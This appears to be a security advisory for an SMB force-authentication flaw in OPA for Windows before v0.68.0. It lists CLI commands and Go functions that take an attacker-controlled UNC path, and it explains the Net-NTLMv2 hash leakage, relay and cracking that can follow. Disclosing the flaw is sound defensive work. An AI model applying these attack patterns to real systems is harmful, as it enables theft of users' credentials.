OPA SMB Force-Authentication

A SMB force-authentication vulnerability exists in all versions of OPA for Windows prior to v0.68.0. The vulnerability exists because of improper input validation, allowing a user to pass an arbitrary SMB share instead of a Rego file as an argument to OPA CLI or to one of the OPA Go library’s functions.

This vulnerability requires one of the following:

• An initial foothold in the environment or social engineering of a user, leading to the execution of the OPA CLI, passing a UNC to the attacker’s server as a Rego rule or bundle path CLI argument.
  • Affected OPA CLI commands:
    • opa eval -d <malicious_UNC_path>
    • opa eval --bundle <malicious_UNC_path>
    • opa run -s <malicious_UNC_path>
• Passing a UNC to the attacker’s server as a Rego rule or bundle path argument to a vulnerable function in the OPA Go package. This package is used in various Go-based services that integrate OPA, so those services may also be impacted. The likelihood and ease of exploitation is highly increased if the vulnerable function gets its input from the user or a third party, especially if the affected platform is internet facing.
  • Affected OPA Go package functions:
    • Rego.Load(<malicious_UNC_path>, nil)
    • Rego.LoadBundle(<malicious_UNC_path>)

A successful exploit of this vulnerability can lead to unauthorized access by leaking the Net-NTLMv2 hash of the user currently logged into the Windows device running the OPA application, provided the victim can initiate outbound Server Message Block (SMB) traffic over port 445. Post-exploitation, the attacker can either relay authentication to other systems that support NTLMv2, or perform offline cracking to extract the password.